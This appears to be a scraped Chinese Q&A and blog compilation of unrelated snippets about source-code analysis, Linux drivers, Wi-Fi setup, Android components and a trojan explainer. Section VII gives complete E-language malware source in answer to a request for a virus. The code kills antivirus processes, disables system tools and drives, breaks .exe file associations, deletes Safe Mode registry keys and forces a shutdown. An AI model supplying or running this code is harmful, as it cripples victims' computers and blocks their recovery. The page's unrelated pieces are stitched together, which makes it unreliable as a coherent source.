Ⅰ 京東hotkey源碼解析
京東hotkey是一個經過京東大促驗證的hotkey防禦中間件,大概原理是通過上報key訪問數到統計伺服器集群,統計伺服器集群將hotkey通知到客戶端,讓hotkey能緩存到本地內存中,做到毫秒級的Scale-Out。處理方式有點像美團cat實時收集數據進行統計,只不過美團cat沒有反向通知邏輯而已。非常貼近工作實踐,值得一看。
首先看一下緩存入口Cache的get方法,JdHotKeyStore.getValue是獲取hotkey的方法,並且會進行訪問次數的統計上報,如果獲取到hotkey不為空,則直接返回,否則從redis獲取並調用JdHotKeyStore.smartSet判斷是否有hotkey,有則設置值,最後返回。
JdHotKeyStore.getValue會先調用inRule校驗此key是否有對應規則,如果沒有對應規則則不處理,然後調用getValueSimple從本地內存中獲取hotkey的存儲對象ValueModel,如果沒有獲取到,則調用HotKeyPusher.push開始計數;如果獲取到,會調用isNearExpire判斷是否快過期了,如果是也計數,然後取出ValueModel里的value是否有設置對應值,有才返回。最後調用KeyHandlerFactory.getCounter().collect進行對應規則的計數。下面來一步步分析此流程。
inRule會去KeyRule緩存中獲取對應的規則,經過層層調用會到KeyRuleHolder的findByKey方法,然後繼續調用其findRule方法選擇對應的KeyRule,如果沒有KeyRule就直接返回了,否則會拿到它的ration(hotkey緩存時間),拿到對應ration的本地緩存。實際上這里為了方法的通用性,用了get來代替contain的判斷。
findRule的邏輯比較特別,作者已經留下了注釋,優先全匹配->prefix匹配-> * 通配,這樣做是為了更精確選擇對應的規則。比如配置了sku_的前綴規則,但是茅台sku的流量突升,需要針對茅台sku的本地緩存再長一點時間讓系統平穩渡過高峰期,那就配置一個sku_moutai_sku_id的全匹配規則,這樣不會干擾到其他sku的緩存規則。
那麼KEY_RULES的規則是怎麼來的呢?這就要說到etcd了,其實可以把etcd當做zookeeper,也有對配置crud,然後通知客戶端的功能。這里是做了定時拉取+監聽變化的雙重保證,這里跟攜程apollo的處理非常像:不要把雞蛋放在一個籃子,兜底功能真的很重要。每5秒定時從etcd拉取規則,開啟監聽器有變化就去etcd拉取規則。fetchRuleFromEtcd從ectd的rule_path獲取rules,然後轉化成ruleList繼續調用notifyRuleChange進行本地處理。
notifyRuleChange會往EventBus發送KeyRuleInfoChangeEvent的通知,進而進入KeyRuleHolder的putRules方法,這里可以看到維護了KEY_RULES和RULE_CACHE_MAP。
回到原有流程,getValueSimple方法的鏈路比較長,主要是通過key的規則,獲取到對應的ration,然後從對應ration的本地緩存中獲取ValueModel。
接下來是HotKeyPusher.push,如果是remove則在etcd創建一個節點然後再刪除,達到集群刪除的效果。如果是探測並且key在規則內,則調用KeyHandlerFactory.getCollector().collect進行統計。
KeyHandlerFactory.getCollector().collect方法交替使用兩個map,對count進行累加,這樣清理map的時候就不需要停頓了,交替使用是避免停頓的有效方式。
接回上文,還有一個 KeyHandlerFactory.getCounter().collect收集的是規則的訪問次數,也是取到對應的規則,然後對規則的訪問總數、熱次數進行累加。
兩個指標的收集已經分析完畢,那怎麼發送到worker呢?來到PushSchelerStarter,這里會啟動對兩個指標的定時線程池,分別會定時調用NettyKeyPusher的send和sendCount方法。
NettyKeyPusher的send和sendCount方法都是為統計數據選擇對應的worker然後進行請求,chooseChannel就是根據key哈希到其中一個worker上,然後發送請求即可。
最後當worker統計到hotkey時,client需要接收worker推送過來的hotkey進行存儲,可以看到NettyClientHandler會向EventBus發送ReceiveNewKeyEvent事件,ReceiveNewKeyListener收到此事件後將調用receiveNewKeyListener.newKey,將hotkey放到本地緩存,client端的處理流程就結束了。
由上文可知,client與worker的交互只有推送統計數據到worker,worker接收處理,最後推送hotkey到client。因此worker端只需要分析兩個部分:統計數據匯總、推送hotkey。
首先看到HotKey的處理邏輯是在HotKeyFilter中,首先會對totalReceiveKeyCount進行累加,然後調用publishMsg,如果統計信息超時1秒或者在白名單中就不處理,否則繼續調用keyProcer.push。
keyProcer.push將未過時的統計信息丟進queue中。
worker端會開啟指定數量的KeyConsumer,不斷消費queue中的統計數據。根據統計數據的類型調用KeyListener的removeKey和newKey。
KeyListener的removeKey和newKey方法對Cache中的滑動窗口SlidingWindow進行刪除或者累加,刪除或者達到一定訪問數就會推送到根據appname選出所有client進行推送。
京東的hotkey處理是通過計數來動態判斷是否為hotkey,然後緩存再本地內存中,做到毫秒級的scale out。那還有沒有其他解決方案?下面是我的觀點:
1.如果面對一些緩存key很少的場景,比如活動頁信息(同時進行的活動頁不可能超過1000),完全就可以直接將緩存放在本地內存中,到了刷新時間就從redis拉取最新緩存即可,不需要動態計算hotkey。也就是常見的多級緩存。
2.同樣是動態判斷hotkey,但會將hotkey遷移到專門的、更多節點、更高性能的hotkey redis集群中,集群中每個節點都有同一個hotkey緩存,這樣就可以做到請求的分散,避免流量都流向同一個redis節點,判斷是hotkey就去hotkey集群中取,不需要存在本地內存中了,維護起來會比較簡單。
Ⅱ Disksim 4源碼 - D3(1) - libparam
...(未完)
這里插播一個編譯過程中遇到的錯誤:
我在 git 時沒有設置好 .gitignore ,主要是.d文件沒有ignore掉,在別的機器下好工程後,.d文件一起被下下來,make時便有錯誤,具體錯誤信息是:
從 <disksim-4.0_dir>/src/moles/Makefile 開始看:
注意到:
$(LIBPARAM)/mod.pl $(PACKAGE) $< 最重要的是這句,我們得知 mod.pl 可以將 *.modspec transform為 $(PACKAGE)_%_param.c 以及 $(PACKAGE)_%_param.h .
由於mod.pl是perl腳本,對此不是很了解,但它做的大概就是按行讀入並有一系列正則表達式的處理。對 *.modspec 做一系列的處理,並且無其他依賴,因此可以單獨將mod.pl拿出來運行。
./mod.pl [package_name] [modspec_file]
例如:
這樣之後可以得到3個文件即 disksim_bus_param.c, disksim_bus_param.h, disksim_bus_param.tex
另外,所有modspec文件將由make_moles_h.pl生成moles.h:
從運行時那些全局結構體的初始化開始看,
調用順序()
這里解析配置文件使用到了lex & yacc(flex/bison),可以稍微看(復習)一下編譯的東西。
看一眼<disksim_dir>/libparam/libparam(.lex|.y)
可以大概看出disksim/libparam的詞法分析和語法樹結構。
Ⅲ Debian linux中有一個不能識別的硬體,找到有人在github上的驅動源碼,如何安裝到系統中。
./configure
./make
./make install
不對啊,你這個鏈接是內核源碼的代碼,編譯安裝這個得需要編譯內核。
下載你的系統內核源碼,然後編譯安裝系統內核吧。
具體的操作步驟度娘知道。
Ⅳ 求會說話的湯姆貓android源代碼
http://search.apkbus.com/f/discuz?mod=forum&formhash=b59cc4be&srchtype=title&srhfid=&srhlocality=forum%3A%3Aindex&sId=5578702&ts=1377077677&cuId=220127&cuName=281749743&gId=16&agId=3&egIds=&fmSign=&ugSign16=&ugSign3=&ext_ffids=&ext_vgIds=0&sign=&charset=utf-8&source=discuz&fId=0&q=%E4%BC%9A%E8%AF%B4%E8%AF%9D%E7%9A%84%E6%B1%A4%E5%A7%86%E7%8C%AB&srchtxt=%E4%BC%9A%E8%AF%B4%E8%AF%9D%E7%9A%84%E6%B1%A4%E5%A7%86%E7%8C%AB&searchsubmit=true
論壇上有幾個
Ⅳ 安裝了Ubuntu14.04為什麼點擊「啟用WiFi"沒有反應呢
希望我的經歷能幫到你。
我是個ubuntu迷,14.04剛出來就找時間裝上來看看,沒想好多問題,首先就是無線鏈接不上,明明輸入了正確的密碼卻無數次彈出框提示要密碼,因為我這里這有wifi,所以只能用wifi必須連無線網,於是在網上找了一下,安裝了一下驅動就解決了
首先確定無線網卡類型:lspci -vnn -d 14e4:
我的網卡:
06:00.0 Network controller [0280]: Broadcom CorporationBCM4313802.11bgn
Wireless Network Adapter [14e4:4727] (rev 01) Subsystem: Broadcom
Corporation Device [14e4:0510] Flags: bus master, fast devsel,
latency 0, IRQ 17 Memory at 99100000 (64-bit, non-prefetchable)
[size=16K] Capabilities: <access denied> Kernel driver in
use: bcma-pci-bridge
先安裝b43-fwcutter工具,如下:下載b43-fwcutter源碼:http://bues.ch/b43/fwcutter/b43-fwcutter-018.tar.bz2解壓後,進入到目錄中,執行makesudo make install
安裝驅動下載驅動文件:http://www.lwfinger.com/b43-firmware/broadcom-wl-5.100.138.tar.bz2 <這個驅動應該對bcm43xx一類的網卡都有用 >
使用b43-fwcutter工具安裝驅動
sudo b43-fwcutter -w /lib/firmware broadcom-wl-5.100.138/linux/wl_apsta.o《注意將下載deb包解壓,這里要根據你解壓的包的地址來》
載入驅動modprobe b43 對於其他種類的無線網卡,可參考網址:http://wireless.kernel.org/en/users/Drivers/b43#devicefirmware
OK ,完成上面幾步就大功告成了,再試試,輕松連上。
Ⅵ Android官方架構組件之LiveData + ViewModel + Room 源碼分析
簡單使用案例:
MainActivity:
MessageViewModel:
其中viewModel.getMessageObserver().observe(this, new Observer() )
中的this即SupportActivity :LifecycleOwner
SupportActivity implements LifecycleOwner
SupportActivity
SupportActivity就是通過getLifecycle()獲取 mLifecycleRegistry來標記當前Activity或Fragment的各種狀態,其中ReportFragment.injectIfNeededIn(this)內部源碼也是與mLifecycleRegistry.markState(Lifecycle.State.CREATED) 類似,狀態的信息記錄在mLifecycleRegistry對象內部。Activity的其他類型的事件如onCreate,onPause等都是通過getLifecycle()獲取 mLifecycleRegistry對象調用mLifecycleRegistry內部方法來改變其狀態的。
Fragment的狀態更加容易看到,FragmentActivity即在Activity的生命周期中獲取
FragmentActivity部分源碼:
通過上面的簡單分析,兩個重要的類即 LifecycleRegistry extends Lifecycle:
下面是Lifecycle抽象類:
回到開始的案例:
LiveData.observe(this, new Observer);
這里我們傳入的Observer和 owner.getLifecycle().addObserver()即 Activity中的Lifecycle 是不同的。
我們上面已經知道Activity中的Lifecycle是與生命周期相關的,通過Lifecycle.addObserver()可以監聽到 Activity的生命周期 然後在LifecycleBoundObserver作出
相應的處理,具體的實現在LifecycleRegistry.addObserver中(Lifecycle實現類),最終會根據事件變化調用 mLifecycleObserver.onStateChanged(owner, event),
LifecycleBoundObserver.onStateChanged -> activeStateChanged -> dispatchingValue -> considerNotify(initiator) -> observer.observer.onChanged((T) mData);
最終調用的是我們傳入的observer。
這樣看來 LiveData<T> 就沒有什麼特殊的了,把它看做一個普通的觀察者模式的管理者即可,比如EventBus。
https://developer.android.com/reference/android/arch/lifecycle/Lifecycle
Ⅶ 求易語言病毒源碼,最好能讓別人死機的源碼,急求,高分
.版本 2
.支持庫 shell
.程序集 窗口程序集1
.子程序 _按鈕1_被單擊
' 繞過殺毒軟體防禦:
運行 (「taskkill /f /im kavsvc.exe」, 假, 1)
運行 (「taskkill /f /im KVXP.kxp」, 假, 1)
運行 (「taskkill /f /im Rav.exe」, 假, 1)
運行 (「taskkill /f /im Ravmon.exe」, 假, 1)
運行 (「taskkill /f /im Mcshield.exe」, 假, 1)
運行 (「taskkill /f /im VsTskMgr.exe」, 假, 1)
' 修改系統時間:
置現行時間 (到時間 (「8888年8月8日」))
' 禁用任務管理器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr」, 0)
' 禁用注冊表:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools」, 1)
' 隱藏開始中的運行 禁止WIN2000/XP通過任務管理器創建新任務:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun」, 1)
' 隱藏「MS-DOS方式」下的磁碟驅動器。不管是在「我的電腦」里,或「MS-DOS」方式下都看不見了:
寫注冊項 (3, 「SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' OVER360防禦:
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\ExecAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\MonAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\SiteAccess」, 0)
寫注冊項 (4, 「SOFTWARE\360Safe\safemon\UDiskAccess」, 0)
' 結束360進程
運行 (「taskkill /f /im 360tray.exe」, 假, 1)
' 隱藏所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives」, 4294967295)
' 禁止所有驅動器:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive」, 4294967295)
' 隱藏文件夾選項:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions」, 1)
' 將桌面對象隱藏:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop」, 1)
' 隱藏開始中的關機:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose」, 1)
' 隱藏開始中的搜索:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind」, 1)
' 這條有兩種情況。1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0啟用兩項
寫注冊項 (3, 「Software\Policies\Microsoft\Windows\System\DisableCMD」, 1)
' 隱藏主頁選項組:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage」, 1)
' 隱藏IE文件菜單:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu」, 1)
' 隱藏收藏夾菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites」, 1)
' 禁用IE列印功能:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting」, 1)
' 隱藏Internet選項:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions」, 1)
' 禁止IE查看源文件:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource」, 1)
' 禁用IE下載功能:
寫注冊項 (3, 「Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803」, 3)
' 禁止右鍵關聯菜單:
寫注冊項 (3, 「Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu」, 1)
' 修改文件關聯:
寫注冊項 (1, 「.txt\」, 「jpegfile」)
寫注冊項 (1, 「.inf\」, 「jpegfile」)
寫注冊項 (1, 「.reg\」, 「jpegfile」)
寫注冊項 (1, 「.exe\」, 「jpegfile」)
' 無法進入安全模式:
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\Network\」)
刪除注冊項 (4, 「SYSTEM\CurrentControlSet\Control\SafeBoot\」)
' 關機:
關閉系統 (2, 真)
Ⅷ busmaster顯示十六進制
BUSMASTER是一個用於設計,監測,分析與模擬CAN網路的開源的開放式匯流排PC軟體。BUSMASTER已被RBEI概念化,設計與開發,同時基於CAN vas 軟體工具。兩種運行模式:
⏹Active模式能影響匯流排
⏹Passive模式時只能監視
●支持CAN 2.0A和CAN 2.0B協議
●十進制或十六進制顯示數據
●三種不同的時間戳表示:
Ⅸ 初看Mybatis 源碼 SQL是怎麼執行的
如果你在vmware下編譯內核,硬碟用的是scsi的,以下三個選項必選:
Device Drivers ---><*>SCSI device support (此項不選的話,下面兩項就選擇不上)
Device Drivers ---><*>SCSI device support ---><*>SCSI disk support
Device Drivers---><8>SCSI device support--->SCSI low-level drivers---><*>; BusLogic SCSI support
Ⅹ *********************************************
下面的這個文章是我在《黑客技術大寶庫》中看到的,作者把木馬(病毒)說明得很詳細,我相信你看了之後會知道不少東西的。
木馬指南
1.這篇文章關於什麼?
在這篇文章里,我將向你解釋木馬及其未來的一些令人感興趣的事情.我希望你能認識到木馬是危險的,
它仍是一個很大的安全問題.盡管許多人說不從網路上下載文件你將不會感染木馬,這是不正確的.我在這兒
想解釋的是木馬有將來及其一些令人感興趣的事.這篇文章只是為基於WINDOWS平台而非UNIX的木馬准備.
2.木馬是什麼?
包含在合法程序里的未授權的程序.該未授權的程序執行用戶未知(很可能不想)的功能.
一個合法的但是已經被改動的程序,在它裡麵包含有未授權的代碼,這段代碼執行用戶未知(很可能不想的功能.
任何看起來執行想要和必須的功能(因為裡面的未授權代碼對用戶是未知的)而實際執行一些用戶未知
(很可能不想)的功能.
TROJANS也能叫做RAT's或遠程管理工具(Remote Administration Tools),TROJAN的名字來自古老的神話故事:
希臘人在戰爭中如何給他們的敵人一個很大的木馬做為禮物,他們接受了這個禮物,把木馬帶進了他們的王國,
在晚上,希臘士兵沖出了木馬,向城市發動了進攻,完全征服了它.
3.木馬的今天
特洛伊木馬一直是一個大的安全問題,即使在如今也是.絕大多數人不知道木馬為何物,他們不停從可疑
的人或不可信的地方下載文件.如今在網上有多於600種我所知的木馬,我想實際會比這多的多,因為如今的每一
個黑客和程序員都有自己的為了他(她)特定需要沒在任何地方公布的木馬.每個黑客小組都有他們自己的木馬
和程序.當有人開始學WINSOCK編程的時候,最先生成的通常是聊天客戶端軟體和木馬.即使有反病毒掃描器(我
將在下面談到),人們仍舊會被感染,被自己,被某些黑客,或被一些朋友.
4.木馬的將來
我想有許多人們認為木馬已經過時,沒有前途,我不這樣認為.木馬將總是有前途,新東西會加到裡面,在
木馬中有如此多的東西可以被有技巧的程序員改善.
有新的選項和更好的加密方法的木馬每天都在由程序員製造,以致防木馬軟體不能檢測到它們.因此,沒有
人知道在網上有多少木馬.但是程序員仍在編制木馬,他們在將來也會繼續.從技術上來說,木馬幾乎可以在任何
地方任何操作系統或硬體平台上出現,然而在前面提到的室內工作除外.木馬的廣泛傳播很象病毒,來自網際網路
的軟體下載,尤其是共享和免費軟體,總是可疑的,類似地,來自地下組織伺服器或用戶新聞組的材料也在侯選
之列.有成千上萬的軟體沒有檢查來源,新程序特別是免費軟體每天都在出現,他們可能都是木馬.因此,留心你
正在下載什麼,正從哪兒下載,總是從正式的頁面下載軟體.
5.防病毒掃描器
人們認為,當他們有了有最新的病毒定義的防病毒掃描器之後,他們在網上就是安全的,他們將不會感染
木馬或沒有人可以訪問.
他們的計算機.這種觀點是不正確的.防病毒掃描器的目的是檢測病毒而不是木馬.但是當木馬流行的時候,
這些掃描器也開始加一些木馬的定義,他們不能發現木馬並分析他們,這就是他們為什麼只能檢測常用和廣為
人知的木馬比如BO和NETBUS或少數幾個其他的.正如我說的,木馬有大約600種,而這些掃描器只能檢測他們中
極少的一部分.這些掃描器不是可以阻止試圖連接你的電腦或試圖攻擊你(正如人們認為他們那樣)的防火牆.
因此,我希望你明白這些掃描器的主要目的不是當你上線的時候檢測木馬並保護你.絕大多數的網際網路用戶只知
道BO和NETBUS是特洛伊木馬,有一些特定的工具只能清除這些木馬,人們就認為他們是安全的能受保
護不感染每一個木馬.
6.我怎麼會感染木馬?
每個人都問這個問題,人們經常問他們自己怎麼會感染上木馬,也有一些人問的時候,他們確實運行了
某些由別人發送或從某個地方下載的文件,人們總是說他們不會運行任何東西或下載某些文件,但是他們做了.
人們總是在上線的時候不注意一些事情,這就是為什麼他們會忘記他們感染木馬是在什麼時候.
你會在任何地方受感染,在這里我會試圖解釋這些事情:
---從ICQ
---從IRC
---從附件
---從物理訪問
---從詭計
6.1 從ICQ
人們認為當他們正用ICQ交談的時候不會感染,然而,他們忘記了某人給他們發送文件的時刻.每個人都知
道ICQ有多不安全,這就是為什麼那麼多人害怕使用它.正如你所知道的,ICQ有一個BUG讓你可以發送EXE文件
給某人,但是文件看起來是BMP或JPG或不管你想讓它看起來象什麼的東西.這是非常危險的,正如你明白的,
你會陷入麻煩.攻擊者將只是把文件的圖標改成象一個BMP圖象,告訴你它是他的相片,將它重命名為photo.bmp,
接著你會得到它,當然,在得到它之前你會看到bmp圖象,此時你是安全的,因為它還沒有被執行,接著你運行
它看照片,你認為沒有什麼可擔心的,其實有.
那是為什麼絕大多數人說他們不運行任何文件,因為他們知道他們運行了一個圖片而不是可執行文件.一
個防止這個ICQ里的BUG的方法是在運行之前總是檢查文件的類型,它可能有一個BMP的圖標但是如果文件類
型寫著可執行,我想你知道如果你運行它的話將是一個錯誤.
6.2 從IRC
你也可能從IRC上通過接收不可信來源文件而感染木馬.我建議你應該總是paranoid,不接收來自任何人
甚至是你的最好的朋友的文件,因為有人可能偷取了他(她)的密碼而來感染你.當有人問某人某些事如一個
秘密或別的只有他(她)知道的事時,他(她)認為他(她)可以100%的確信問的那個人是他(她)的朋友,
正如我告訴你paranoid,因為有人可以感染你的朋友並檢查他(她)的IRC日誌,看秘密是什麼或了解其他的
事情.正如我所說,paranoid是更安全的,不要接受任何來自在IRC上的任何人的文件或其他地方如EMAIL,
ICQ,甚至你的在線朋友.
6.3 從附件
同樣的事情也會伴隨EMAIL附件發生.不要運行任何東西即使它說你將會看到熱辣的色情作品或一些服
